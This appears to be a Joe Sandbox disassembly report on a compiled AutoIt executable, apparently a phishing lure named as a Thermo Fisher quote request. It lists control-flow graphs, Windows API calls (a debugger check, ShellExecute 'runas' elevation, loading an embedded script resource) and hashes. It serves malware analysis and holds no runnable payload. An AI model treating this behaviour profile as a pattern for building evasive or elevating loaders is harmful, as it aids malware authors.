95419 606eed 48 API calls 95417->95419 95420 606a63 48 API calls 95418->95420 95421 6062d1 95419->95421 95420->95421 95422 620fa7 95421->95422 95423 620fb3 95422->95423 95424 621028 95422->95424 95428 620fd8 95423->95428 95472 627c0e 47 API calls __getptd_noexit 95423->95472 95474 62103a 59 API calls 3 library calls 95424->95474 95427 621035 95427->95299 95428->95299 95429 620fbf 95473 626e10 8 API calls __cftof2_l 95429->95473 95431 620fca 95431->95299 95432->95338 95434 60bdfa 48 API calls 95433->95434 95435 6061b1 95434->95435 95435->95390 95437 604517 83 API calls 95436->95437 95438 64c405 95437->95438 95439 64c56d 94 API calls 95438->95439 95440 64c417 95439->95440 95441 6044ed 64 API calls 95440->95441 95469 64c41b 95440->95469 95442 64c432 95441->95442 95443 6044ed 64 API calls 95442->95443 95444 64c442 95443->95444 95445 6044ed 64 API calls 95444->95445 95446 64c45d 95445->95446 95447 6044ed 64 API calls 95446->95447 95448 64c478 95447->95448 95449 604517 83 API calls 95448->95449 95450 64c48f 95449->95450 95451 62395c std::exception::_Copy_str 47 API calls 95450->95451 95452 64c496 95451->95452 95453 62395c std::exception::_Copy_str 47 API calls 95452->95453 95454 64c4a0 95453->95454 95455 6044ed 64 API calls 95454->95455 95456 64c4b4 95455->95456 95457 64bf5a GetSystemTimeAsFileTime 95456->95457 95458 64c4c7 95457->95458 95459 64c4f1 95458->95459 95460 64c4dc 95458->95460 95462 64c556 95459->95462 95463 64c4f7 95459->95463 95461 621c9d _free 47 API calls 95460->95461 95464 64c4e2 95461->95464 95466 621c9d _free 47 API calls 95462->95466 95471 64b965 118 API calls __fcloseall 95463->95471 95467 621c9d _free 47 API calls 95464->95467 95466->95469 95467->95469 95468 64c54e 95470 621c9d _free 47 API calls 95468->95470 95469->95407 95469->95408 95470->95469 95471->95468 95472->95429 95473->95431 95474->95427 95476 62f8a0 __ftell_nolock 95475->95476 95477 6040b4 GetLongPathNameW 95476->95477 95478 606a63 48 API calls 95477->95478

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 643 62b043-62b080 call 62f8a0 646 62b082-62b084 643->646 647 62b089-62b08b 643->647 648 62b860-62b86c call 62a70c 646->648 649 62b0ac-62b0d9 647->649 650 62b08d-62b0a7 call 627bda call 627c0e call 626e10 647->650 651 62b0e0-62b0e7 649->651 652 62b0db-62b0de 649->652 650->648 657 62b105 651->657 658 62b0e9-62b100 call 627bda call 627c0e call 626e10 651->658 652->651 656 62b10b-62b110 652->656 661 62b112-62b11c call 62f82f 656->661 662 62b11f-62b12d call 633bf2 656->662 657->656 692 62b851-62b854 658->692 661->662 673 62b133-62b145 662->673 674 62b44b-62b45d 662->674 673->674 676 62b14b-62b183 call 627a0d GetConsoleMode 673->676 677 62b463-62b473 674->677 678 62b7b8-62b7d5 WriteFile 674->678 676->674 699 62b189-62b18f 676->699 683 62b55a-62b55f 677->683 684 62b479-62b484 677->684 680 62b7e1-62b7e7 GetLastError 678->680 681 62b7d7-62b7df 678->681 686 62b7e9 680->686 681->686 687 62b663-62b66e 683->687 688 62b565-62b56e 683->688 690 62b48a-62b49a 684->690 691 62b81b-62b833 684->691 696 62b7ef-62b7f1 686->696 687->691 695 62b674 687->695 688->691 697 62b574 688->697 700 62b4a0-62b4a3 690->700 693 62b835-62b838 691->693 694 62b83e-62b84e call 627c0e call 627bda 691->694 698 62b85e-62b85f 692->698 693->694 701 62b83a-62b83c 693->701 694->692 702 62b67e-62b693 695->702 704 62b7f3-62b7f5 696->704 705 62b856-62b85c 696->705 706 62b57e-62b595 697->706 698->648 707 62b191-62b193 699->707 708 62b199-62b1bc GetConsoleCP 699->708 709 62b4a5-62b4be 700->709 710 62b4e9-62b520 WriteFile 700->710 701->698 712 62b699-62b69b 702->712 704->691 714 62b7f7-62b7fc 704->714 705->698 715 62b59b-62b59e 706->715 707->674 707->708 716 62b1c2-62b1ca 708->716 717 62b440-62b446 708->717 718 62b4c0-62b4ca 709->718 719 62b4cb-62b4e7 709->719 710->680 711 62b526-62b538 710->711 711->696 720 62b53e-62b54f 711->720 721 62b6d8-62b719 WideCharToMultiByte 712->721 722 62b69d-62b6b3 712->722 724 62b812-62b819 call 627bed 714->724 725 62b7fe-62b810 call 627c0e call 627bda 714->725 726 62b5a0-62b5b6 715->726 727 62b5de-62b627 WriteFile 715->727 728 62b1d4-62b1d6 716->728 717->704 718->719 719->700 719->710 720->690 731 62b555 720->731 721->680 735 62b71f-62b721 721->735 732 62b6c7-62b6d6 722->732 733 62b6b5-62b6c4 722->733 724->692 725->692 737 62b5b8-62b5ca 726->737 738 62b5cd-62b5dc 726->738 727->680 740 62b62d-62b645 727->740 729 62b36b-62b36e 728->729 730 62b1dc-62b1fe 728->730 743 62b370-62b373 729->743 744 62b375-62b3a2 729->744 741 62b200-62b215 730->741 742 62b217-62b223 call 621688 730->742 731->696 732->712 732->721 733->732 745 62b727-62b75a WriteFile 735->745 737->738 738->715 738->727 740->696 748 62b64b-62b658 740->748 750 62b271-62b283 call 6340f7 741->750 763 62b225-62b239 742->763 764 62b269-62b26b 742->764 743->744 752 62b3a8-62b3ab 743->752 744->752 753 62b77a-62b78e GetLastError 745->753 754 62b75c-62b776 745->754 748->706 749 62b65e 748->749 749->696 774 62b435-62b43b 750->774 775 62b289 750->775 757 62b3b2-62b3c5 call 635884 752->757 758 62b3ad-62b3b0 752->758 762 62b794-62b796 753->762 754->745 760 62b778 754->760 757->680 777 62b3cb-62b3d5 757->777 758->757 765 62b407-62b40a 758->765 760->762 762->686 768 62b798-62b7b0 762->768 771 62b412-62b42d 763->771 772 62b23f-62b254 call 6340f7 763->772 764->750 765->728 770 62b410 765->770 768->702 769 62b7b6 768->769 769->696 770->774 771->774 772->774 785 62b25a-62b267 772->785 774->686 778 62b28f-62b2c4 WideCharToMultiByte 775->778 781 62b3d7-62b3ee call 635884 777->781 782 62b3fb-62b401 777->782 778->774 779 62b2ca-62b2f0 WriteFile 778->779 779->680 784 62b2f6-62b30e 779->784 781->680 788 62b3f4-62b3f5 781->788 782->765 784->774 787 62b314-62b31b 784->787 785->778 787->782 789 62b321-62b34c WriteFile 787->789 788->782 789->680 790 62b352-62b359 789->790 790->774 791 62b35f-62b366 790->791 791->782
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: acdafc200b434b8c3f581a56cf68b14140f6919114108438d0ddb09f03afa5a3
                                                              • Instruction ID: 0bf38cc445958dd3278711ebc999aff32e408429ae23e6a2517aaae1255ac337
                                                              • Opcode Fuzzy Hash: acdafc200b434b8c3f581a56cf68b14140f6919114108438d0ddb09f03afa5a3
                                                              • Instruction Fuzzy Hash: 78326D75B026288BDB24CF54EC81AE9B7F6FF46310F1851D9E40AA7A85D7309E80CF52

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00603AA3,?), ref: 00603D45
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,00603AA3,?), ref: 00603D57
                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,006C1148,006C1130,?,?,?,?,00603AA3,?), ref: 00603DC8
                                                                • Part of subcall function 00606430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00603DEE,006C1148,?,?,?,?,?,00603AA3,?), ref: 00606471
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,00603AA3,?), ref: 00603E48
                                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,006B28F4,00000010), ref: 00671CCE
                                                              • SetCurrentDirectoryW.KERNEL32(?,006C1148,?,?,?,?,?,00603AA3,?), ref: 00671D06
                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0069DAB4,006C1148,?,?,?,?,?,00603AA3,?), ref: 00671D89
                                                              • ShellExecuteW.SHELL32(00000000,?,?,?,?,00603AA3), ref: 00671D90
                                                                • Part of subcall function 00603E6E: GetSysColorBrush.USER32(0000000F), ref: 00603E79
                                                                • Part of subcall function 00603E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00603E88
                                                                • Part of subcall function 00603E6E: LoadIconW.USER32(00000063), ref: 00603E9E
                                                                • Part of subcall function 00603E6E: LoadIconW.USER32(000000A4), ref: 00603EB0
                                                                • Part of subcall function 00603E6E: LoadIconW.USER32(000000A2), ref: 00603EC2
                                                                • Part of subcall function 00603E6E: RegisterClassExW.USER32(?), ref: 00603F30
                                                                • Part of subcall function 006036B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006036E6
                                                                • Part of subcall function 006036B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00603707
                                                                • Part of subcall function 006036B8: ShowWindow.USER32(00000000,?,?,?,?,00603AA3,?), ref: 0060371B
                                                                • Part of subcall function 006036B8: ShowWindow.USER32(00000000,?,?,?,?,00603AA3,?), ref: 00603724
                                                                • Part of subcall function 00604FFC: _memset.LIBCMT ref: 00605022
                                                                • Part of subcall function 00604FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 006050CB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                              • String ID: ()k$This is a third-party compiled AutoIt script.$runas
                                                              • API String ID: 438480954-3464277351
                                                              • Opcode ID: 46b6013093cfb85d1ded0cca5b7fbc704d27e8e88aac66976a65e0e486312d89
                                                              • Instruction ID: 8158fb42969a8303dd1f9cc4c82e3f848957fe651b49495ba8750dcd5d1b0069
                                                              • Opcode Fuzzy Hash: 46b6013093cfb85d1ded0cca5b7fbc704d27e8e88aac66976a65e0e486312d89
                                                              • Instruction Fuzzy Hash: F7510830A84249AACF19ABB4DC55EFF7B7B9F07700F04526DF5026B2D2DA6446458B21

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1075 61ddc0-61de4f call 60d7f7 GetVersionExW call 606a63 call 61dfb4 call 606571 1084 61de55-61de56 1075->1084 1085 6724c8-6724cb 1075->1085 1088 61de92-61dea2 call 61df77 1084->1088 1089 61de58-61de63 1084->1089 1086 6724e4-6724e8 1085->1086 1087 6724cd 1085->1087 1092 6724d3-6724dc 1086->1092 1093 6724ea-6724f3 1086->1093 1091 6724d0 1087->1091 1104 61dea4-61dec1 GetCurrentProcess call 61df5f 1088->1104 1105 61dec7-61dee1 1088->1105 1094 61de69-61de6b 1089->1094 1095 67244e-672454 1089->1095 1091->1092 1092->1086 1093->1091 1101 6724f5-6724f8 1093->1101 1096 61de71-61de74 1094->1096 1097 672469-672475 1094->1097 1099 672456-672459 1095->1099 1100 67245e-672464 1095->1100 1102 672495-672498 1096->1102 1103 61de7a-61de89 1096->1103 1106 672477-67247a 1097->1106 1107 67247f-672485 1097->1107 1099->1088 1100->1088 1101->1092 1102->1088 1108 67249e-6724b3 1102->1108 1109 67248a-672490 1103->1109 1110 61de8f 1103->1110 1104->1105 1127 61dec3 1104->1127 1112 61df31-61df3b GetSystemInfo 1105->1112 1113 61dee3-61def7 call 61e00c 1105->1113 1106->1088 1107->1088 1114 6724b5-6724b8 1108->1114 1115 6724bd-6724c3 1108->1115 1109->1088 1110->1088 1117 61df0e-61df1a 1112->1117 1122 61df29-61df2f GetSystemInfo 1113->1122 1123 61def9-61df01 call 61dff4 GetNativeSystemInfo 1113->1123 1114->1088 1115->1088 1119 61df21-61df26 1117->1119 1120 61df1c-61df1f FreeLibrary 1117->1120 1120->1119 1126 61df03-61df07 1122->1126 1123->1126 1126->1117 1129 61df09-61df0c FreeLibrary 1126->1129 1127->1105 1129->1117
                                                              APIs
                                                              • GetVersionExW.KERNEL32(?), ref: 0061DDEC
                                                              • GetCurrentProcess.KERNEL32(00000000,0069DC38,?,?), ref: 0061DEAC
                                                              • GetNativeSystemInfo.KERNELBASE(?,0069DC38,?,?), ref: 0061DF01
                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 0061DF0C
                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 0061DF1F
                                                              • GetSystemInfo.KERNEL32(?,0069DC38,?,?), ref: 0061DF29
                                                              • GetSystemInfo.KERNEL32(?,0069DC38,?,?), ref: 0061DF35
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                              • String ID:
                                                              • API String ID: 3851250370-0
                                                              • Opcode ID: d8646a9658e831df2561aecf791c3bdb5e101117b9ff5e89c5863fef1bcd8987
                                                              • Instruction ID: 965a1ae71ac47ba04da05c0bfbaee92769cf76ae1215339fa61115550a76176e
                                                              • Opcode Fuzzy Hash: d8646a9658e831df2561aecf791c3bdb5e101117b9ff5e89c5863fef1bcd8987
                                                              • Instruction Fuzzy Hash: FE6192B180A384DFCF15CF6898C15E97FB6AF29300B1989D9D8499F34BC634CA49CB65

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1147 60406b-604083 CreateStreamOnHGlobal 1148 6040a3-6040a6 1147->1148 1149 604085-60409c FindResourceExW 1147->1149 1150 674f16-674f25 LoadResource 1149->1150 1151 6040a2 1149->1151 1150->1151 1152 674f2b-674f39 SizeofResource 1150->1152 1151->1148 1152->1151 1153 674f3f-674f4a LockResource 1152->1153 1153->1151 1154 674f50-674f6e 1153->1154 1154->1151
                                                              APIs
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0060449E,?,?,00000000,00000001), ref: 0060407B
                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0060449E,?,?,00000000,00000001), ref: 00604092
                                                              • LoadResource.KERNEL32(?,00000000,?,?,0060449E,?,?,00000000,00000001,?,?,?,?,?,?,006041FB), ref: 00674F1A
                                                              • SizeofResource.KERNEL32(?,00000000,?,?,0060449E,?,?,00000000,00000001,?,?,?,?,?,?,006041FB), ref: 00674F2F
                                                              • LockResource.KERNEL32(0060449E,?,?,0060449E,?,?,00000000,00000001,?,?,?,?,?,?,006041FB,00000000), ref: 00674F42
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                              • String ID: SCRIPT
                                                              • API String ID: 3051347437-3967369404
                                                              • Opcode ID: bff0808c8127e0478b470f64fa25dfc7f4255cd857d004618fbac148601d23d0
                                                              • Instruction ID: f833ddc6e24a18ee1ac0a931f3da11dc19ccaf5f75a7f41d8a75f4852336c7ab
                                                              • Opcode Fuzzy Hash: bff0808c8127e0478b470f64fa25dfc7f4255cd857d004618fbac148601d23d0
                                                              • Instruction Fuzzy Hash: 8D111CB1240701BFE7259B65EC48F677BBAEFC9B55F10416CF60296290DB61DD008A30
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throwstd::exception::exception
                                                              • String ID: @$ l$ l$ l
                                                              • API String ID: 3728558374-2045459291
                                                              • Opcode ID: ae751a14e37458cb165c459b5925efb2b289296705cdde9782061fc89153c3b5
                                                              • Instruction ID: c140c3e2ba39ee4f9bd99effb33889678fb8c47ea9159ad120edd2f1b669158a
                                                              • Opcode Fuzzy Hash: ae751a14e37458cb165c459b5925efb2b289296705cdde9782061fc89153c3b5
                                                              • Instruction Fuzzy Hash: 4B728E70E042159FCF14DF94C481AEEB7B7EF48310F18805AE91AAB351DB35AE86CB95
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00672F49), ref: 00646CB9
                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00646CCA
                                                              • FindClose.KERNEL32(00000000), ref: 00646CDA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: FileFind$AttributesCloseFirst
                                                              • String ID:
                                                              • API String ID: 48322524-0
                                                              • Opcode ID: fbdba58237d7bf2c1328262b88e2ee1c5d50287d48d35e387b8e530dc28f9f78
                                                              • Instruction ID: e551771f6d1392e0c47d364122c4a871421a3b24543c3baa671f46631d46e886
                                                              • Opcode Fuzzy Hash: fbdba58237d7bf2c1328262b88e2ee1c5d50287d48d35e387b8e530dc28f9f78
                                                              • Instruction Fuzzy Hash: EEE048318145156783106738EC4D8E9776EDF06339F104715F5B5C12D0E7B0D94446E6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: l
                                                              • API String ID: 3964851224-900832589
                                                              • Opcode ID: 25baeb5f2a7822aebc2ace86819ce9b628cef515e562293f3990d6da2f96e268
                                                              • Instruction ID: 078d8c1b31f8487db36a42d084218729fd5a3bbaab905c6574dd2bc5176bc345
                                                              • Opcode Fuzzy Hash: 25baeb5f2a7822aebc2ace86819ce9b628cef515e562293f3990d6da2f96e268
                                                              • Instruction Fuzzy Hash: 2F928D70608351DFD764DF18C484BAAB7E2BF84304F18885DE99A8B392D771ED85CB92
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0060E959
                                                              • timeGetTime.WINMM ref: 0060EBFA
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0060ED2E
                                                              • TranslateMessage.USER32(?), ref: 0060ED3F
                                                              • DispatchMessageW.USER32(?), ref: 0060ED4A
                                                              • LockWindowUpdate.USER32(00000000), ref: 0060ED79
                                                              • DestroyWindow.USER32 ref: 0060ED85
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0060ED9F
                                                              • Sleep.KERNEL32(0000000A), ref: 00675270
                                                              • TranslateMessage.USER32(?), ref: 006759F7
                                                              • DispatchMessageW.USER32(?), ref: 00675A05
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00675A19
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                              • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                              • API String ID: 2641332412-570651680
                                                              • Opcode ID: ae98628a022751736c800de2757dd27e4cc6952f5bb2470ecd96eb11eb06766e
                                                              • Instruction ID: 055aa573b454fc9694a82aa0ead741b893eb10af4b28cc1d39c3622952f8b84f
                                                              • Opcode Fuzzy Hash: ae98628a022751736c800de2757dd27e4cc6952f5bb2470ecd96eb11eb06766e
                                                              • Instruction Fuzzy Hash: 6C62D1705443509FEB68DF24C895BAB77E7BF44300F0849ADE94A8B2D2DBB2D844CB52
                                                              APIs
                                                              • ___createFile.LIBCMT ref: 00635EC3
                                                              • ___createFile.LIBCMT ref: 00635F04
                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00635F2D
                                                              • __dosmaperr.LIBCMT ref: 00635F34
                                                              • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00635F47
                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00635F6A
                                                              • __dosmaperr.LIBCMT ref: 00635F73
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00635F7C
                                                              • __set_osfhnd.LIBCMT ref: 00635FAC
                                                              • __lseeki64_nolock.LIBCMT ref: 00636016
                                                              • __close_nolock.LIBCMT ref: 0063603C
                                                              • __chsize_nolock.LIBCMT ref: 0063606C
                                                              • __lseeki64_nolock.LIBCMT ref: 0063607E
                                                              • __lseeki64_nolock.LIBCMT ref: 00636176
                                                              • __lseeki64_nolock.LIBCMT ref: 0063618B
                                                              • __close_nolock.LIBCMT ref: 006361EB
                                                                • Part of subcall function 0062EA9C: CloseHandle.KERNELBASE(00000000,006AEEF4,00000000,?,00636041,006AEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0062EAEC
                                                                • Part of subcall function 0062EA9C: GetLastError.KERNEL32(?,00636041,006AEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0062EAF6
                                                                • Part of subcall function 0062EA9C: __free_osfhnd.LIBCMT ref: 0062EB03
                                                                • Part of subcall function 0062EA9C: __dosmaperr.LIBCMT ref: 0062EB25
                                                                • Part of subcall function 00627C0E: __getptd_noexit.LIBCMT ref: 00627C0E
                                                              • __lseeki64_nolock.LIBCMT ref: 0063620D
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00636342
                                                              • ___createFile.LIBCMT ref: 00636361
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0063636E
                                                              • __dosmaperr.LIBCMT ref: 00636375
                                                              • __free_osfhnd.LIBCMT ref: 00636395
                                                              • __invoke_watson.LIBCMT ref: 006363C3
                                                              • __wsopen_helper.LIBCMT ref: 006363DD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                              • String ID: @
                                                              • API String ID: 3896587723-2766056989
                                                              • Opcode ID: 02d493786cc2a23a2000741d55f2d60f5fae2b34a4edd446f129aa4d938e8c8a
                                                              • Instruction ID: ce5cee5db2888c51eab3734b2c2acfe085728ba29a03fa438a46054327d1fa71
                                                              • Opcode Fuzzy Hash: 02d493786cc2a23a2000741d55f2d60f5fae2b34a4edd446f129aa4d938e8c8a
                                                              • Instruction Fuzzy Hash: 5022E271904A0AABEB299F68DC45BED7B63EF00314F248229F5229B3D1C3358D51CBD5

                                                              Control-flow Graph

                                                              APIs
                                                              • _wcscpy.LIBCMT ref: 0064FA96
                                                              • _wcschr.LIBCMT ref: 0064FAA4
                                                              • _wcscpy.LIBCMT ref: 0064FABB
